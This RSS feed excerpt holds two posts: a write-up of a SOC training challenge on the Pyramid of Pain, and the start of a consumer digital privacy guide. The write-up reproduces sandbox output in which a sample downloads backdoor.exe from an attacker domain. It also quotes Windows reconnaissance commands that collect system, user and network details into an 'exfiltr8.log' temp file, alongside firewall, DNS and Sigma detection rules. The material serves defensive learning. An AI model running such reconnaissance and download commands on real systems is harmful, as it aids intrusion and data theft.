<ol><li>Go to the Burger Menu, then click on the Firewall Manager tool. We need to fill some fields, which we will as follows:</li>
<li><strong>Type</strong>: Egress</li>
<li><strong>Source IP</strong>: Any</li>
<li><strong>Destination IP</strong>: 154.35.10.113</li>
<li><strong>Action:</strong> Deny</li></ol>

<p>We will receive a congratulating message and a new email with <strong>flag 2.</strong></p>

<h4 id="extra-why-not-the-other-two-ips">Extra: Why not the other two IPs</h4>

<p>According to the analysis, the file would make a connection to another two addresses: 40.97.128.3 and 40.97.128.4. These IP addresses, however, were identified to belong to Microsoft whereas the one we chose apparently belongs to a hosting service. Connecting to a Microsoft IP address is completely normal for business operations... not so much connecting to and downloading files from an IP address that belongs to a hosting service.</p>

<h2 id="task-3-what-is-the-third-flag-you-receive-after-successfully-detecting-sample3-exe">Task 3: What is the third flag you receive after successfully detecting <strong>sample3.exe</strong>?</h2>

<p>Changing one&#39;s IP address is not particularly hard – the attacker mentions on their email message that they hired a new Cloud Service Provider and now have access to many more IPs. The <strong>third level of the Pyramid of Pain</strong> corresponds to <strong>Domain Names</strong>.</p>
<ol><li>Read the new email and analyze the <strong>sample3.exe</strong> file.</li></ol>

<p>Under <strong>Network Activity</strong> we will have a new section, <strong>DNS requests.</strong></p>

<p><em>(output omitted)</em></p>

<h3 id="network-activity-1">Network Activity</h3>

<h4 id="http-s-requests-1">HTTP(S) requests</h4>

<h4 id="2">2</h4>

<h4 id="tcp-udp-connections-1">TCP/UDP connections</h4>

<h4 id="4">4</h4>

<h4 id="dns-requests-1">DNS requests</h4>

<h4 id="2-1">2</h4>

<h4 id="threats-1">Threats</h4>

<h4 id="0-2">0</h4>

<h4 id="http-requests-1">HTTP requests</h4>

<table>
<thead>
<tr>
<th>PID</th>
<th>Process</th>
<th>Method</th>
<th>IP</th>
<th>URL</th>
</tr>
</thead>

<tbody>
<tr>
<td>1021</td>
<td>sample3.exe</td>
<td>GET</td>
<td>62.123.140.9:1337</td>
<td><a href="http://emudyn.bresonicz.info:1337/kzn293la" rel="nofollow">http://emudyn.bresonicz.info:1337/kzn293la</a></td>
</tr>

<tr>
<td>1021</td>
<td>sample3.exe</td>
<td>GET</td>
<td>62.123.140.9:80</td>
<td><a href="http://emudyn.bresonicz.info/backdoor.exe" rel="nofollow">http://emudyn.bresonicz.info/backdoor.exe</a></td>
</tr>
</tbody>
</table>

<h4 id="connections-1">Connections</h4>

<table>
<thead>
<tr>
<th>PID</th>
<th>Process</th>
<th>IP</th>
<th>Domain</th>
<th>ASN</th>
</tr>
</thead>

<tbody>
<tr>
<td>1021</td>
<td>sample3.exe</td>
<td>40.97.128.4:443</td>
<td>services.microsoft.com</td>
<td>Microsoft Corporation</td>
</tr>

<tr>
<td>1021</td>
<td>sample3.exe</td>
<td>62.123.140.9:1337</td>
<td>emudyn.bresonicz.info</td>
<td>XplorIta Cloud Services</td>
</tr>

<tr>
<td>1021</td>
<td>sample3.exe</td>
<td>62.123.140.9:80</td>
<td>emudyn.bresonicz.info</td>
<td>XplorIta Cloud Services</td>
</tr>

<tr>
<td>2712</td>
<td>backdoor.exe</td>
<td>62.123.140.9:80</td>
<td>emudyn.bresonicz.info</td>
<td>XplorIta Cloud Services</td>
</tr>
</tbody>
</table>

<h4 id="dns-requests-2">DNS requests</h4>

<table>
<thead>
<tr>
<th>Domain</th>
<th>IP</th>
</tr>
</thead>

<tbody>
<tr>
<td>services.microsoft.com</td>
<td>40.97.128.4</td>
</tr>

<tr>
<td>emudyn.bresonicz.info</td>
<td>62.123.140.9</td>
</tr>
</tbody>
</table>

<p>The <strong>DNS requests</strong> section showed us the domain the executable is downloading files from, <strong>emudyn.bresonicz.info.</strong> The other one belongs to Microsoft, so we can assume it&#39;s safe.</p>
<ol><li>Head to the Burger menu, and then click on <strong>DNS Rule Manager.</strong></li>
<li>Click on <strong>Create DNS Rule</strong></li>
<li>We have to fill some fields. Do so as follows:
<ul><li><strong>Rule name</strong>: (Any works. I named it “Deny Phishing Domain.”)</li>
<li><strong>Category</strong>: Phishing</li>
<li><strong>Domain Name</strong>: emudyn.bresonicz.info</li>
<li><strong>Action</strong>: Deny</li></ul></li></ol>

<p>We will receive a congratulating message and a new email with <strong>flag 3.</strong></p>

<h2 id="task-4-what-is-the-fourth-flag-you-receive-after-successfully-detecting-sample4-exe">Task 4: What is the fourth flag you receive after successfully detecting sample4.exe?</h2>

<p>Changing one&#39;s domain is harder than changing an IP address, as this requires purchasing a new domain and modifying DNS records. Still, a very determined hacker might still be willing to do so (and also, some DNS providers have loose standards). The next level of the <strong>Pyramid of Pain</strong> corresponds to <strong>Host and Network Artifacts.</strong></p>
<ol><li>Read the email and analyze <strong>sample4.exe</strong>.</li></ol>

<p>The new email will contain a <strong>Registry Activity</strong> section after all the previous one. Let&#39;s take a look at that one.</p>

<p><em>(output omitted)</em></p>

<h3 id="registry-activity">Registry Activity</h3>

<h4 id="total-events">Total events</h4>

<h4 id="3-1">3</h4>

<h4 id="read-events">Read events</h4>

<h4 id="1-1">1</h4>

<h4 id="write-events">Write events</h4>

<h4 id="2-2">2</h4>

<h4 id="delete-events">Delete events</h4>

<h4 id="0-3">0</h4>

<h4 id="modification-events">Modification events</h4>

<table>
<thead>
<tr>
<th><strong>(PID) Process:</strong> (3806) sample4.exe</th>
<th><strong>Key:</strong> HKEY<em>LOCAL</em>MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection</th>
</tr>
</thead>

<tbody>
<tr>
<td><strong>Operation:</strong> write</td>
<td><strong>Name:</strong> DisableRealtimeMonitoring</td>
</tr>

<tr>
<td><strong>Value:</strong> 1</td>
<td></td>
</tr>

<tr>
<td><strong>(PID) Process:</strong> (1928) explorer.exe</td>
<td><strong>Key:</strong> HKEY<em>CURRENT</em>USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced</td>
</tr>

<tr>
<td><strong>Operation:</strong> write</td>
<td><strong>Name:</strong> EnableBalloonTips</td>
</tr>

<tr>
<td><strong>Value:</strong> 1</td>
<td></td>
</tr>

<tr>
<td><strong>(PID) Process:</strong> (9876) notepad.exe</td>
<td><strong>Key:</strong> HKEY<em>CURRENT</em>USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts.txt</td>
</tr>

<tr>
<td><strong>Operation:</strong> read</td>
<td><strong>Name:</strong> Progid</td>
</tr>

<tr>
<td><strong>Value:</strong> txtfile</td>
<td></td>
</tr>
</tbody>
</table>

<p>If we look at the first event, <strong>sample4.exe</strong> appears to be disabling Windows Defender Real-Time Protection by modifying the Windows Registry. This is the <strong>artifact</strong>, finding this is how we know we have a potentially infected host. We now have to create a rule that <strong>alerts</strong> us when this happens.</p>
<ol><li>Go to the Burger Menu, then click on <strong>Sigma Rule Builder.</strong></li>
<li>Click on <strong>Create Sigma Rule</strong>. A Sigma rule will be generated by an LLM based on the options we pick.</li>
<li>On the “<em>I want to create a rule that focuses on:</em>” section, pick <strong>Sysmon Event Logs.</strong></li>
<li>On “<em>I want to target this Sysmon event:</em>”, pick <strong>Registry Modifications.</strong></li>
<li>You have to fill some fields to generate the rule. Fill them as follows:
<ul><li><strong>Registry Key</strong>: HKEY<em>LOCAL</em>MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection</li>
<li><strong>Registry Name</strong>: DisableRealtimeMonitoring</li>
<li><strong>Value</strong>: 1</li>
<li><strong>ATT&amp;CK ID</strong>: Defense Evasion (TA0005)</li></ul></li>
<li>Click on the Validate Rule button.</li></ol>

<p>Once it generates the Sigma rule, we will receive a congratulating message and a new email with <strong>flag 4.</strong></p>

<h4 id="extra-why-alert-and-not-respond">Extra: why “alert” and not “respond”.</h4>

<p>The reason we are creating a rule to <strong>alert</strong> rather than to respond like we did in the previous steps is because disabling Real Time Protection is, while unusual (and warned against on modern Windows), a potentially benign action. We alert the cybersecurity team when it occurs so they can investigate the situation and determine if it is expected or not, instead of just not allowing and potentially hindering a normal business operation.</p>

<h2 id="task-5-what-is-the-fifth-flag-you-receive-after-successfully-detecting-sample5-exe">Task 5: What is the fifth flag you receive after successfully detecting sample5.exe?</h2>

<p>Knowing the artifacts an attacker leaves on a system means the attacker will have to change their tools and methodologies, which means they will have to spend even more resources to attack our system. We are now on the highest levels of the pyramid, the ones with the highest difficulty for the attacker to bypass, and at this point it&#39;s very likely they changed their target. Still, if the attacker persists, the <strong>second-to-last level of the Pyramid of Pain</strong> corresponds to detecting <strong>Tools</strong>.</p>
<ol><li>Read the new email and click on <strong>sample5.exe</strong>
According to the email, the “heavy lifting” and instructions now occur on their backend server, which means we will have significantly less information on the file&#39;s actions.</li></ol>

<p>This time we don&#39;t have the results of an analysis, but a log of attempted connections:</p>

<p>“
2023-08-15 09:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 09:23:45 | Source: 10.10.15.12 | Destination: 43.10.65.115 | Port: 443 | Size: 21541 bytes
2023-08-15 09:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 10:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 10:14:21 | Source: 10.10.15.12 | Destination: 87.32.56.124 | Port: 80  | Size: 1204 bytes
2023-08-15 10:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 11:45:09 | Source: 10.10.15.12 | Destination: 145.78.90.33 | Port: 443 | Size: 805 bytes
2023-08-15 12:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 12:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 13:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 13:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 13:32:17 | Source: 10.10.15.12 | Destination: 72.15.61.98  | Port: 443 | Size: 26084 bytes
2023-08-15 14:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 14:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 14:55:33 | Source: 10.10.15.12 | Destination: 208.45.72.16 | Port: 443 | Size: 45091 bytes
2023-08-15 15:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 15:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 15:40:10 | Source: 10.10.15.12 | Destination: 101.55.20.79 | Port: 443 | Size: 95021 bytes
2023-08-15 16:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 16:18:55 | Source: 10.10.15.12 | Destination: 194.92.18.10 | Port: 80  | Size: 8004 bytes
2023-08-15 16:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 17:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 17:09:30 | Source: 10.10.15.12 | Destination: 77.23.66.214 | Port: 443 | Size: 9584 bytes
2023-08-15 17:27:42 | Source: 10.10.15.12 | Destination: 156.29.88.77 | Port: 443 | Size: 10293 bytes
2023-08-15 17:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 18:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 18:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 19:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 19:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 20:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 20:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes
2023-08-15 21:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes</p>

<p>I confess the first thing I noticed was that the length for a lot of the attempts: most of them were over 10 KB in length. Then I realized what the actual problem with this log was: <strong>most of them go to the same destination, with the exact same byte length.</strong></p>

<p>The attacker is probably using a tool that fragments messages in 97 bytes. Let us create a Sigma rule to detect when this happens.</p>
<ol><li>Go to <strong>Create Sigma Rule</strong>, then click on <strong>Sysmon Event Logs.</strong></li>
<li>On “<em>I want to target this Sysmon event:</em>”, pick <strong>Network Connections.</strong></li>
<li>Fill the requested fields as follows:
<ul><li><strong>Remote IP</strong>: Any</li>
<li><strong>Remote Port</strong>: Any</li>
<li><strong>Size (bytes)</strong>: 97</li>
<li><strong>Frequency (seconds)</strong>: 1800</li>
<li><strong>ATT&amp;CK ID</strong>: Command and Control (TA0011)</li></ul></li></ol>

<p>Once it generates the Sigma rule, we will receive a congratulating message and a new email with <strong>flag 5.</strong></p>

<h4 id="extra-why-this-rule">Extra: why this rule</h4>

<p>Like in the previous task, we need to <strong>alert</strong> rather than to block, as legitimate network traffic may match this criteria. We chose the Remote IP and Remote Port to be “Any” because we now the attacker can change their IP address, but this also causes that this rule could be triggered at any point. However, SOC analysts would notice how many messages with the same length would go to the same IP address, and the fact that it happens every 30 minutes without fail, and respond to it. This is a common Defense Evasion technique, as fragmented messages are stealthier than sending all the data meant to be exfiltrated at once, and would also stop Data Loss Prevention systems from being executed.</p>

<h2 id="task-6-what-is-the-final-flag-you-receive-from-sphinx">Task 6: What is the final flag you receive from Sphinx?</h2>

<p>A top attacker might have enough money and time to invest in changing and/or building and learning new tools and methodologies. We are at the <strong>last level of the Pyramid of Pain</strong>, and this corresponds to the <strong>Tactics, Techniques, and Procedures</strong> of the attacker. If we can detect and respond to how an attacker operates, they have almost no chance to fight back.</p>
<ol><li>Read the final email and open the attachment.</li></ol>

<p>This time the attachment is a log of the commands the sample files run once opened:
<blockquote>dir c:\ &gt;&gt; %temp%\exfiltr8.log
<br>
dir “c:\Documents and Settings” &gt;&gt; %temp%\exfiltr8.log
<br>
dir “c:\Program Files\” &gt;&gt; %temp%\exfiltr8.log
<br>
dir d:\ &gt;&gt; %temp%\exfiltr8.log
<br>
net localgroup administrator &gt;&gt; %temp%\exfiltr8.log
<br>
ver &gt;&gt; %temp%\exfiltr8.log
<br>
systeminfo &gt;&gt; %temp%\exfiltr8.log
<br>
ipconfig /all &gt;&gt; %temp%\exfiltr8.log
<br>
netstat -ano &gt;&gt; %temp%\exfiltr8.log
<br>
net start &gt;&gt; %temp%\exfiltr8.log
</blockquote>
This is showing us the sample files were using commands that display important system information (directory trees, user list, system info, network information) and redirect the output to a file named <strong>exfiltr8.log</strong>, located in the <strong>temp</strong> folder (common place to hide malware, as nearly everything has writing permissions here.)
Let us generate a rule to detect the creation of this file.</p>
<ol><li>Go to <strong>Create Sigma Rule</strong>, and then click on <strong>System Event Logs.</strong></li>
<li>On “<em>I want to target this Sysmon event:</em>”, pick <strong>File Creation and Modification.</strong></li>
<li>Fill the requested fields as follows:
<ul><li><strong>File Path</strong>: %temp%</li>
<li><strong>File Name</strong>: exfiltr8.log</li>
<li><strong>ATT&amp;CK ID</strong>: Collection (TA0009)</li></ul></li></ol>

<p>Once it generates the Sigma rule, we will receive a congratulating message and a new email with the <strong>final flag.</strong></p>

<p><b style="color:darkgreen">Congratulations!</b> The room is finished.</p>

<h2 id="what-i-learnt">What I Learnt</h2>
<ul><li><strong>Pyramid of Pain</strong>: this challenge allowed me to strengthen my knowledge on the framework, forcing me to think why each level has its corresponding difficulty, by thinking how an attacker could bypass a detection or deny rule.</li>
<li><strong>Sigma rule structure</strong>: levels 3 to 5 involved generating a Sigma rule, which the SOC L1 learning path (this challenge was part of it) has no room on at this point.</li>
<li><strong>Analyzing logs</strong>: task 5 was about to look for a specific pattern in a log file. Even if at first I focused on the wrong pattern, I managed to realize quite quickly what was I supposed to be looking for.</li>
<li><strong>Learning how an attacker might hide their actions, and thinking of False Positives</strong>: some tasks involved the attacker hiding their signatures, or hiding their actions by modifying system files. For these I had to consider about False Positives as well, as some of their actions could be similar to normally benign actions, and creating an overly lax detection rule might make the SOC team focus on the wrong alert.</li></ul>
]]></content:encoded>
      <author>plutogazer writeups</author>
      <guid>https://infosec.press/read/a/hredvmzyx6</guid>
      <pubDate>Tue, 20 Jan 2026 22:55:39 +0000</pubDate>
    </item>
    <item>
      <title>The Essential Digital Privacy Guide</title>
      <link>https://infosec.press/river_ramble/the-essential-digital-privacy-guide</link>
      <description>&lt;![CDATA[This guide will cover various recommendations for Windows/Linux/iOS with an eye for free, open-source, private software and privacy-enhancing tips. Given the amount I&#39;ll be covering, it will not be in maximum depth (i.e., I do not always offer all possible options or my full reasoning for recommendations). Please refer to my PC Privacy Guide, iOS Privacy Guide, and De-Googling Guide back on my old Substack for more focused guides.&#xA;&#xA;And yes, non-corporate Linux and Graphene is vastly preferable to Windows and iOS. Your privacy on Windows and iOS is inherently compromised. You can, however, reduce data collection in some marginal ways, and you certainly can improve the external privacy of your system (i.e., reduce the amount that web trackers are monitoring you and such). Frankly, I do not yet have sufficient experience with either to really cover them in detail, nor do I think that installing a new OS is a privacy tip that most people will just up and follow. This article is aimed towards people who may not be willing to go that far yet. I do have some brief comments on OS options on.&#xA;&#xA;I&#39;ll hopefully be putting out a follow-up post to this fairly soon, so stay posted for that. It&#39;ll be more FOSS and recommendations of cool tools rather than what I consider to be essential privacy steps.&#xA;&#xA;Additional Resources&#xA;Between these resources, you pretty much have this whole page and then some (excluding a small handful of more niche tips I have in here). &#xA;&#xA;Privacy Guides and Avoid the Hack - Websites managed by people familiar with the privacy world, and so tend to have much better recommendations than similar sites. You can find recommended browsers, operating systems, email providers, etc.&#xA;&#xA;Awesome Privacy - A &#34;curated list&#34; of privacy &amp; security-focused software and services. Does not have the detail that Privacy Guides typically does, but it also has more recommendations than they do (while keeping recommendations at a decent quality). &#xA;&#xA;O&amp;O Software - Makers of a number of tools that can make Windows more secure/private. Many of the tools are paid, but AppBuster and ShutUp10++ are both free, and I highly recommend ShutUp10++ in particular for disabling Windows bloat/spyware.&#xA;&#xA;EFF’s Cover Your Tracks - A tool that attempts to fingerprint your browser in order to determine how protected you are. Extremely helpful for testing whether features are truly improving your privacy. Am I Unique and BrowserLeaks are also very useful for the same purpose.&#xA;&#xA;Privacy Tests - A website which compares open-source tests of browser privacy. It is one of the easiest ways to quickly compare the major browsers.&#xA;&#xA;Avoid the Hack’s Browser Comparison Tool - Similar to Privacy Tests, but more generalized and with information on more browsers.&#xA;&#xA;De-Googling&#xA;&#xA;While you may still need a Google account for certain things, you certainly can adjust settings to improve privacy and migrate most services away from Google. &#xA;&#xA;For tweaks, most of the settings you&#39;ll want will be under Data &amp; Privacy in Google Account. You&#39;ll ideally want to disable everything under Things you’ve done and places you’ve been. You&#39;ll also want to limit the amount of info shared under Info you can share with others and cut down on the number of third-party services under Data from apps and services you use.&#xA;&#xA;Beyond the general tweaks, I&#39;d highly recommend disabling all &#34;personalization&#34; and &#34;smart&#34; features, as nowadays that is often cover for AI-powered data harvesting. You can find a number of these features under general Gmail settings.&#xA;&#xA;As for migration, Google&#39;s Dashboard, Takeout, and Delete Services will be your friends. Dashboard shows a general overview of your data and services, Takeout allows you to export your data, and Delete Services, of course, allows you to delete things.&#xA;&#xA;Recommendations&#xA;Google Search -  Startpage, DuckDuckGo, or SearXNG. Startpage is a simple Google and Bing wrapper, so should work well for most users. DDG has been implementing AI features I&#39;m really not a fan of, but it does have some very handy features, an onion service, and a version of the engine without AI, so DDG NoAI is my personal choice. SearXNG is the most versatile of the 3, even including search functions for torrents and other specifics, but service can be a bit spotty in my experience.&#xA;&#xA;Gmail -  Tuta Mail or Mailbox Mail, and/or Thunderbird. Tuta and Mailbox Mail are both encrypted email providers that will be a significant step up from Gmail. That being said, bear in mind that the main gain is privacy in respect towards the provider - end-to-end encryption, by definition, is only ever enabled for these services if the person you are emailing uses a compatible encryption service. I&#39;ve personally heard better things about Tuta&#39;s user experience, and it&#39;s what I personally use. If you continue to use Gmail, I&#39;d recommend using Thunderbird as an email client, as it will provide some modest improvements over accessing your Gmail on the web (and does enable E2EE if you&#39;re looking to do so).&#xA;&#xA;Google Maps -  Open Street Map/Organic Maps or Apple Maps. Open Street Map is community-developed, which is great, but means that it isn&#39;t always as up-to-date. Organic Maps is the one iOS app for OSM that I know of (though there may be others), and it doesn&#39;t have the best routing features, nor is it always up-to-date with OSM, even. For most people with iPhones, I&#39;d recommend just using Apple Maps, as it is marginally more private than Google Maps, and much more comparable in features/map data.&#xA;&#xA;Google Drive -  CryptPad or LibreOffice. Privacy Guides only recommends CryptPad, so it&#39;s my primary choice as well. Filen is a good second choice, especially if you need more than 1 free GB (Filen offers 10). LibreOffice is a decent primarily offline replacement, though as consequence it&#39;s more a Microsoft Office replacement than a Google one.&#xA;&#xA;Google Photos - Ente. If you&#39;re wanting a specifically online photo/video manager, Ente is your best bet. Naturally, you could also simply store things offline or use one of the Drive replacements.&#xA;&#xA;YouTube -  FreeTube. You have a lot of options for YouTube replacements, including alternative front-ends like Invidious and Fediverse equivalents like PeerTube. If you want to keep your subscriptions, however, a client is the way to go (Invidious had some support for accounts/subs, but I believe that&#39;s largely died). FreeTube is not the only client option, but it is easily my favorite. You can import your subcriptions quite easily, but for playlists you may have to import from URLs. Since Watch Later cannot be made public, to import it from URL you will have to copy it to another playlist, then import that playlist. The extension Multiselect for YouTube makes this fairly quick. FreeTube will occasionally break for a short time after YouTube changes things, but generally it works quite well, and has some fantastic features.&#xA;&#xA;Google News -  NetWireNews (iOS) or Feeder (Android). I&#39;d highly recommend using RSS for your news aggregation. It gives you much better control, and you can avoid ads and all other nonsense. You can typically add news sources simply by pasting in their URL, though occasionally you may need to add /rss or /feed to the end.&#xA;&#xA;Google Keep -  Obsidian. It has so many great features; I truly can&#39;t recommend it enough.&#xA;&#xA;Google Meet -  Jitsi Meet. Naturally, you may not always have a choice, but Jitsi is the preferred option for secure video calls.&#xA;&#xA;Hardware&#xA;&#xA;Avoid smart home devices at any cost, end of story. For a phone, ideally, I&#39;d recommend a Pixel with GrapheneOS, the gold-standard for secure mobile OSs (Graphene has plans to be available on other phones, but this is still in the works). Privacy Guides also has some app recommendations and advice on how best to obtain apps (of particular note - avoid the Google Play store, and F-Droid isn’t the best either).&#xA;&#xA;iOS Recommendations&#xA;&#xA;Privacy and Security Settings&#xA;&#xA;First, something you might not want to hear - go to General -  AirDrop and set to Receiving Off. In other words, you should disable AirDrop. It may be fun, but it is an attack vector that is trivially easy to exploit. For activists, I would likewise suggest disabling Face ID (Privacy Guides has a &#34;Protestors Guide to Smartphone Security&#34; that is very worth checking out).&#xA;&#xA;Shut off everything under Analytics and Improvements and Apple Advertising. Under Tracking, disable Allow Apps to Request to Track and disable permissions for all the apps that requested it. &#xA;&#xA;Under Location Services, review which apps have access and disable or limit any unnecessary ones. This should include location logging for the Camera app! Next, at the bottom of Location Services you’ll want to go into System Services. You can disable the vast majority of these services. Emergency Calls and SOS, Find My iPhone, and Share My Location should probably be left enabled for most people. Disabling Networking and Wireless can potentially impact performance, since you may not always be connected to the closest tower. Personally, I haven’t noticed a difference. Everything under Product Improvement (iPhone Analytics, etc) should be disabled as well. &#xA;&#xA;Still under System Services, I would also highly recommend disabling Significant Locations. This feature logs locations you visit in order to determine the titular “significant” locations, allowing it to effectively have map pins for your home, work, favorite grocery store, friends’ apartments, etc. This will clear certain Apple Maps saved locations, but I would recommend it regardless.&#xA;&#xA;Lastly, I&#39;d recommend going through Safety Check to see and confirm/retract information you are still sharing. Enabling the App Privacy Report can also be useful, as it logs what domains apps are contacting. (Note that it&#39;ll be on you to go back later and see what apps are regularly contacting Facebook; it&#39;s just a passive report).&#xA;&#xA;iCloud&#xA;&#xA;Obviously, anything in your iCloud can potentially be accessed by Apple. Thankfully, Apple does offer end-to-end encryption for iCloud, though it is disabled by default. Be aware that enabling it means that if you ever fully get locked out of your phone / iCloud, Apple will not be able to retrieve your stuff.&#xA;&#xA;Under iCloud, disable anything you don’t need backed up (and consider that that could mean everything). You may also want to consider disabling Access iCloud Data on the Web at the bottom. Most crucially, enable Advanced Data Protection. &#xA;&#xA;Network&#xA;&#xA;Go to Wi-Fi, then select the i by your Wi-Fi network. Scroll down to Private Wi-Fi Address. Set this to Rotating if it isn’t already, and below it enable Limit IP Address Tracking. While your iPhone generally will, by default, generate a different address for each network, it may not be set to randomize on the same network. Rotating is generally better, but for networks that force you through a portal (like hotels), it may make you sign back in each time. (This is why, you’ll note, these settings are individual to each network).&#xA;&#xA;I&#39;d recommend setting up a private DNS, with Mullvad&#39;s &#34;base&#34; DNS being my top recommendation. This will help keep your browsing a little more private, with the added benefit of blocking ads, trackers, and malware. You can follow Mullvad&#39;s instructions on setting it up. It is fairly straightforward, but do be sure to do the seemingly pointless step of selecting the profile in Files (step 7), otherwise the Profile Download button will not appear in step 9.&#xA;&#xA;A VPN isn&#39;t a bad idea either, though in my experience mobile VPNs can be a bit buggy at times. Proton VPN is the only good free option I know of (even though I don&#39;t wholly trust Proton), while Mullvad VPN would be my recommendation for anyone who can pay for a VPN. IVPN is pretty good as well, and fairly comparable to Mullvad. I would strongly recommend against any VPN that isn&#39;t those 3.&#xA;&#xA;Browser&#xA;&#xA;While there are an array of options for iOS browsers, the choices are in actuality limited by the restrictions that Apple places on browsers that are not Safari. Brave, DuckDuckGo, and Firefox Focus do all have some improvements over base Safari. So barring any tweaking, I&#39;d recommend DDG as a daily driver and Firefox Focus if you want permanent incognito (I do not recommend Brave, both for the crypto BS and because the CEO is homophobic). &#xA;&#xA;Overall, however, if you truly want a private browser, Safari is the best choice. I would recommend following Privacy Guide&#39;s tips for settings to harden it, excluding their recommendation to enable FaceID for private browsing (I don&#39;t recommend biometrics in general, since they potentially allow access without your consent). &#xA;&#xA;I would also highly recommend installing either uBlock Origin Lite or wBlock as content-blocking Safari Extensions. uBlock Origin is the gold-standard content blocker, but unfortunately only the &#34;Lite&#34; version is available on Safari. The main limitations are in customization, so uBlock Origin Lite is probably great for most people. wBlock does edge it out a bit for me personally, as it is more customizable and (at least claims) lower resource usage.&#xA;&#xA;Other Apps/Reccs&#xA;&#xA;Use Signal whenever possible. Other messaging apps like WhatsApp or Telegram are marginally more secure than iMessage, but are significantly less secure than Signal.&#xA;&#xA;Do not include locations on images, and ideally, go a step further and scrub the metadata entirely. You can create a button via Shortcuts to do this pretty easily. Note that you’ll need separate shortcuts for photos, videos, and GIFs. Making a GIF shortcut is very similar to the photos shortcut, but instead of using Convert, you use Make GIF. You could also just install an app to scrub metadata, but I&#39;d recommend against it, as you don&#39;t know what is truly being done with your photos.&#xA;&#xA;As mentioned, you can use Organic Maps for a totally private maps, though it isn&#39;t amazing. Again, Apple Maps is at least marginally better than Google Maps.&#xA;&#xA;PC Privacy&#xA;&#xA;Naturally, many of my De-Googling recommendations will be relevant here, so refer back to that if needed (for Office/Drive replacements, search engines, email, etc).&#xA;&#xA;Operating Systems&#xA;&#xA;I&#39;m still a relative noob to Linux, but I have some potential distro recommendations - or, rather, Privacy Guides does. They recommend Fedora, openSUSE Tumbleweed, Arch Linux, and NixOS for privacy-conscious distributions. Of those, Fedora is the most beginner-friendly (which may not be saying too much if you have 0 command-line or Linux experience).&#xA;&#xA;You&#39;ll also often have a choice of desktop environment, such as GNOME, KDE, Cinnamon, LXQt, and Xfce. Across both distros and desktop environments, you may see that some are considered &#34;lightweight&#34;, meaning that they are less resource intensive, and so may be good for older hardware.&#xA;&#xA;I have only really used Lubuntu, a lightweight fork of Ubuntu using the LXQt desktop environment (I wouldn&#39;t recommend Ubuntu itself, as it&#39;s become pretty corporate). I put it on several old laptops and it&#39;s been pretty nice, though I think I&#39;d probably use Fedora KDE if I wanted a true daily driver (greater privacy and support as far as I know, probably lower likelihood to run into some of the issues I&#39;ve hit). &#xA;&#xA;You can get most OSs &#34;live&#34;, meaning you can put them on a USB and boot from them without overwriting your true OS. Very handy for testing, and actually pretty easy! There are also some OSs that are purely live, such as Tails, which is an OS designed specifically for maximum privacy, routing connections through Tor and wiping data when done. You can also use Virtual Machines to run different OSs, including Whonix, which is similar to Tails, but with greater security features  (and exclusively runs inside a VM).&#xA;&#xA;Windows Settings&#xA;&#xA;Again, I’d highly recommend anyone who feels comfortable to jump to Linux to do so (and consider testing out a live OS, switching over may be easier than you think!). Otherwise, software like Revision can &#34;clean&#34; existing Windows 10/11. Please tread carefully if you’re interested; I can&#39;t attest much to functionality or trustworthiness. There are other options available for cleaner installs, but if you&#39;re willing to reinstall your OS, I would again highly encourage switching to Linux (compatibility has improved dramatically in recent years!).&#xA;&#xA;Barring messing with your operating system directly, though, there are certainly still important steps you can take. To start, use ShutUp10++ to disable invasive Windows features - it will provide a GUI with recommendations and explanations for what should be disabled. Some following settings changes will be redundant with ShutUp10++.&#xA;&#xA;Privacy and Security - In settings, go under Privacy &amp; Security. Under General, turn off the Advertising ID in particular, along with the other settings in that section (except notifications). Disable everything under Diagnostics &amp; Feedback and Text &amp; Image Generation. Under Location, turn off Let Apps Access Your Location (they can still see approximate location; this just gets rid of precise location).&#xA;&#xA;General Settings - Under 